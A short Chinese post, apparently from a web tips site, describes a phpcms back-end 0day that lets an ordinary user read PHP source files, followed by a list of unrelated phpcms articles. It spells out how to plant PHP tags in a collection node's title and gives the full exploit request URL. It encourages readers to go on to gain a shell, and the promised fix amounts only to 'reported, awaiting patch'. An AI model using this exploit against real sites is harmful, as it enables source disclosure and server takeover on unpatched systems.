phpcms后台普通用户读文件0day的分析以及修复方法
后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
您可能感兴趣的文章
- 01-10phpcms常见问题解答
- 01-10phpcms语法规则
- 01-10PHPCMS网站转移空间教程
- 01-10PHPCMS2008 SP4 心情排行指数不显示的解决办法
- 01-10phpcms频道首页调用所有一级栏目及二级栏目
- 01-10phpcms标签模板及专题模板的制作
- 01-10PHPCMS系统自带标签说明
- 01-10为PHPCMS 2008 编辑器增加常用中文字体方法
- 01-10PHPcms 2008 注册选择模型关闭后,注册不能自动登录的问题
- 01-10phpcms模仿QQ和MSN消息提示的效果